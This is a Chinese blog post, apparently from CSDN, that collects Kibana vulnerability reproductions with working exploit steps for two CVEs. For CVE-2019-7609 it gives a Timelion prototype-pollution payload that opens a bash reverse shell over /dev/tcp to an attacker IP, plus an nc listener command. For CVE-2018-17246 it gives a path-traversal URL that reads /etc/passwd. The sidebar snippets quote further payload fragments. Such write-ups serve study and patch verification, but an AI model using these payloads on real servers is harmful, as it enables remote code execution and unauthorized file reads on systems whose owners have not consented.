kibana 漏洞收集总结

最新推荐文章于 2025-10-03 02:08:43 发布

原创最新推荐文章于 2025-10-03 02:08:43 发布 · 8k 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#安全漏洞

漏洞复现专栏收录该内容

11 篇文章

订阅专栏

本文详细解析了Kibana中的两个严重安全漏洞：CVE-2019-7609远程代码执行漏洞和CVE-2018-17246文件包含漏洞。CVE-2019-7609允许攻击者通过Timelion模块执行任意代码，而CVE-2018-17246则可通过特定路径读取系统文件。

一：cve-2019-7609 命令执行

Kibana存在远程代码执行漏洞，影响版本为5.6.15和6.6.0之前的所有版本。拥有Kibana的Timelion模块访问权限的人可以以Kibana的运行权限执行任意代码，包括反弹shell
访问

http://ip:5601/app/timelion

输入payload

.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/192.168.0.136/12345 0>&1");process.exit()//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ’)

在这里插入图片描述
攻击机起监听

Nc -lvnp 12345

参考：https://github.com/mpgn/CVE-2019-7609
http://blog.leanote.com/post/snowming/2cd6256df61d

二：cve-2018-17246 文件包含

kibana version < 6.4.3
kibana version < 5.6.13

http://ip:5601/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd

将在文件后台查看到密码日志
参考：https://github.com/zhengjim/loophole/tree/master/CVE-2018-17246

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

sojrs_sec

关注关注

1
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

web渗透测试漏洞复现：Kibana 未授权访问

HACKONE的博客

03-20

1070

Kibana是一个开源的分析与可视化平台，设计出来用于和Elasticsearch一起使用的。你可以用kibana搜索、查看存放在Elasticsearch中的数据。Kibana与Elasticsearch的交互方式是以各种不同的图表、表格、地图等直观地展示数据，从而达到高级的数据分析与可视化的目的。Elasticsearch、Logstash和Kibana这三个技术就是我们常说的ELK技术栈，可以说这三个技术的组合是大数据领域中一个很巧妙的设计。一种很典型的MVC思想，模型持久层，视图层和控制层。

漏洞预警：Elasticsearch的Kibana存在任意代码执行漏洞（CVE-2025-25012）

yuanlirong22的专栏

03-07

1366

Elasticsearch的Kibana存在任意代码执行漏洞（CVE-2025-25012）。允许攻击者操纵应用程序的JavaScript对象和属性，可能导致未经授权的数据访问、权限提升、拒绝服务或远程代码执行。在Kibana 8.15.0和8.17.1之间的版本中，该漏洞仅可由具有查看者角色的用户利用。在Kibana版本8.17.1和8.17.2中，它只能被具有fleet-all或integrations-all或actions:execute-advanced-connectors权限的用户利用。

参与评论您还未登录，请先登录后发表或查看评论

插件安全实战：Kibana代码审计与漏洞防护指南

最新发布

gitblog_01029的博客

10-03

232

作为Elastic Stack可视化窗口，Kibana插件生态系统在扩展功能的同时也引入了安全风险。本文将从代码审计流程、常见漏洞类型和防护策略三个维度，帮助开发者构建更安全的插件。 ## 安全审计基础框架 Kibana安全插件提供了完整的权限控制体系，核心实现位于[x-pack/plugins/security/server/authorization](https://link.gitco...

Kibana未授权访问漏洞

lhdbk______的博客

08-05

1068

Kibana未授权访问漏洞

Kibana任意文件包含漏洞(CVE-2018-17246)

EC_Carrot的博客

07-07

1022

漏洞详细 Kibana是一个开源的分析与可视化平台，设计出来用于和Elasticsearch一起使用的。其5.6.13到6.4.3之间的版本存在一处文件包含漏洞，通过这个漏洞攻击者可以包含任意服务器上的文件。如果能够上传一个文件，就能够包含该文件来执行代码。漏洞复现首先在靶机内创个代码文件，以便后续操作 #echo '...code...' > /tmp/vulhub.js export default {asJson: function() {return require("child_proc

【严重】Kibana 8.7.0 任意代码执行漏洞

murphysec的博客

05-23

1500

Kibana是用于Elasticsearch的数据可视化仪表板。Kibana在8.7.0版本引入了Synthetic监控功能，用户可配置编写playwright中的javascript代码实现web应用监控。具备Kibana登录权限的攻击者可利用此功能编写恶意playwright脚本，从而在Kibana主机中执行任意系统命令。

Kibana 原型链污染导致任意代码执行漏洞 (CVE-2019-7609)

EnerY3的博客

12-12

1331

CVE-2019-7609 是一个存在于 Kibana 5.6.15 到 6.6.1 版本中的远程代码执行漏洞，它允许攻击者通过原型链污染（Prototype Pollution）在目标服务器上执行任意 JavaScript 代码。这个漏洞是由于 Timelion 组件中的安全问题导致的。

使用Elastic Security检测最新的spring4shell漏洞

点火三周的专栏

04-08

1684

这个漏洞在清明假期刚出来的时候就想研究一下，一直拖延到现在。看来是已经赶不上热度了，但我觉得还是值得记录一下的。特别是Elastic刚刚在Forrester的“终端检测与响应Wave”报告中，被评为“Strong Performer”（卓越表现者）而对于这种层出不穷的零日漏洞，即便是购买了昂贵的网络安全设备都防不住，只能做事后诸葛。那不如考虑看看免费的开源解决方案，并且检测与响应已经成为了一种安全防御的共识：边界防御是一定会被渗透的，快速的检测与响应是必须的。 Spring4Shell 漏洞的工作原理

基于Weblogic的Java反序列化漏洞实验总结漏洞攻击及防护中用到的工具、心得等。3000字

06-20

### 基于WebLogic的Java反序列化漏洞实验总结 #### ### 实验背景与目标 Java反序列化漏洞是企业级应用中常见的安全问题之一，特别是在WebLogic等中间件中。这类漏洞允许攻击者通过构造恶意的序列化数据来触发远程...

Kibana 7.13.4 安装包下载指南

总结：Kibana 7.13.4作为Elastic Stack中的可视化组件，它的安装和使用需要与其他组件如Elasticsearch紧密配合。通过下载相应的安装包并按照官方指南进行安装，用户可以构建起一个强大的数据分析平台。需要注意的是...

免费方案：Kibana 监控 windows server 服务器系统资源，内网穿透

joe45的博客

09-07

3208

kibana 监控服务器目录预览 1、需求说明 1.1 工具选择 2、metricbeat工具介绍 3、安装部署 3.1 下载 3.2 配置 3.3 安装 3.4 启动 4、验证 5、性能 6、维护 7、Troubleshooting 一, 需求说明 1.1 监控需求随着公司平台和外网项目的更多使用，针对项目的云平台部署运用、...

14、PLC系统中的漏洞分析

gg901的博客

06-16

135

本文深入探讨了可编程逻辑控制器（PLC）系统中的漏洞分析方法和技术，涵盖了硬件和软件层面的漏洞识别、静态与动态分析技术、模糊测试方法以及风险评估模型。通过构建事件数据图（EDG）直观展示系统组件依赖关系，并提出漏洞管理流程和响应策略。同时，展望了未来在自动化、智能化及数据驱动下的漏洞检测与响应方向，为保障工业控制系统安全性提供全面指导。

Elasticsearch 核心插件Kibana 本地文件包含漏洞分析（CVE-2018-17246）

weixin_33726318的博客

01-02

614

不久前Elasticsearch发布了最新安全公告， Elasticsearch Kibana 6.4.3之前版本和5.6.13之前版本中的Console插件存在严重的本地文件包含漏洞可导致拒绝服务攻击、任意文件读取攻击、配合第三方应用反弹SHELL攻击，下文笔者对其漏洞背景、攻击原理和行为进行分析和复现。 0X01 影响范围 Elasticsearch Kibana是荷兰Elasticsea...

kibana漏洞复现

Shanfenglan's blog

11-30

2797

文章目录1. kibana是什么2. CVE-2018-17246 文件包含漏洞2.1 利用3. Kibana 原型链污染导致任意代码执行漏洞 (CVE-2019-7609)3.1 利用 1. kibana是什么一般与Elasticsearch一起工作，作用是将Elasticsearch中的数据可视化的表现出来并与之进行交互。它本身是一个web应用，可以通过5601端口去访问。 2. CVE-2018-17246 文件包含漏洞影响版本： 5.6.13到6.4.3 2.1 利用通常情况下Kibana与

Kibana远程代码执行漏洞攻击方法和漏洞原理分析

HBohan的博客

07-04

1752

漏洞简介 Kibana存在远程代码执行漏洞，影响版本为5.6.15和6.6.0之前的所有版本。拥有Kibana的Timelion模块访问权限的人可以以Kibana的运行权限执行任意代码，包括反弹shell。环境搭建领取相关学习资料靶机环境： Parrot Security OS 4.7 64位或其他类Linux操作系统（VMWare 14） Elasticsearch6.5.4 Kibana 6.5.4 IP：10.10.10.128 攻击机环境： Windows 10 Home 64.

Kibana本地文件包含漏洞（CVE-2018-17246）复现

玄道的网安博客

03-09

2685

漏洞概述 Kibana 为 Elassticsearch 设计的一款开源的视图工具。其5.6.13到6.4.3之间的版本存在一处文件包含漏洞，通过这个漏洞攻击者可以包含任意服务器上的文件。此时，如果攻击者可以上传一个文件到服务器任意位置，即可执行代码。影响版本 ElasticSearch Kibana < 6.4.3 ElasticSearch Kibana < 5.6.13 环境搭建这里使用docker进行安装 https://github.c...

Kibana未授权访问漏洞记录（CVE-2019-7609，Kibana的RCE，原型链污染，端口:5601）

墨痕诉清风的博客

11-12

5625

漏洞描述 Kibana 为 Elassticsearch 设计的一款开源的视图工具。其5.6.15到6.6.1之间的版本中存在一处原型链污染漏洞，利用这个漏洞我们可以在目标服务器上执行任意JavaScript代码。漏洞复现环境启动后，访问 http://your-ip:5601 即可看到Kibana页面。原型链污染发生在“Timeline”页面，我们填入如下Payload：创建文件 .es(*).props(label.__proto__.env.AAAA='require("chil

漏洞预警 | Elastic Kibana 存在任意代码执行漏洞（CVE-2025-25012）

C20220511的博客

03-14

809

在Kibana版本8.17.1和8.17.2中只有拥有包含以下所有权限的角色才能利用此漏洞：fleet-all、integrations-all以及actions:execute-advanced-connectors。据描述，该漏洞源于原型污染问题，攻击者可通过精心设计的文件上传和特制的 HTTP 请求执行任意代码，获取服务器敏感数据，进而控制整服务器。Elastic Kibana 8.17.3 版本已解决 CVE-2025-25012 漏洞，并强烈敦促所有用户尽快升级到此版本。